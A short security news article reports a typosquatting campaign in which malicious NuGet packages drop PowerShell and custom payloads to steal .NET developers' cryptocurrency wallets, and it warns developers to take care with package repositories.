HQ/EMEAFind out how we can help your business
Threat actors have a new cryptocurrency stealing campaign that uses malicious NuGet packages to compromise [.]net developers. The attackers have been masquerading as legitimate packages through typosquatting.
Based on reports, three malicious packages have been downloaded by users more than 150,000 times in under a month. The hackers could have infected thousands of dot net developers while increasing the legitimacy of their malicious NuGet packages.
The researchers claimed numerous users downloaded the top three infectious packages thousands of times, indicating that the cybercriminal operation was highly successful. However, the recent tally is not an entirely reliable indicator of the attack’s success since the threat actors could have inflated the download count through bots to make their packages seem legitimate.
The hackers use typosquatting methods to create their NuGet packages.
According to investigations, the NuGet packages developers used the typosquatting tactic to spoof legitimate developers’ account of Microsoft that works on the NuGet [.]NET package manager.
Moreover, these miscreants designed these malicious packages to download and run a PowerShell-based dropper script configuring the infected device to enable PowerShell execution without limitations.
Subsequently, the campaign downloads and deploys a second-stage payload, a windows executable that is an entirely custom executable payload. This strategy is an unusual method for the attacks since they usually utilise open-source tools and commodity malware during their attacks instead of generating an independent load.
Furthermore, the hackers who deployed the malware on an infected system could serve as a tool to steal crypto by exfiltrating the victims’ cryptocurrency wallets using Discord webhooks. In addition, the actors could also complete this crypto-stealing campaign by running malicious code from Electron archives and auto-updating by querying the attacker-controlled C2 server.
Payloads spread in this cybercriminal operation have a meagre detection rate, and the defender could not flag these tools. Therefore, simply built-in an anti-malware component in the MS Windows OS is insufficient in detecting such threats.
These repository attacks have been prevalent for the past few months. Therefore, developers should be more cautious in acquiring packages from repositories.
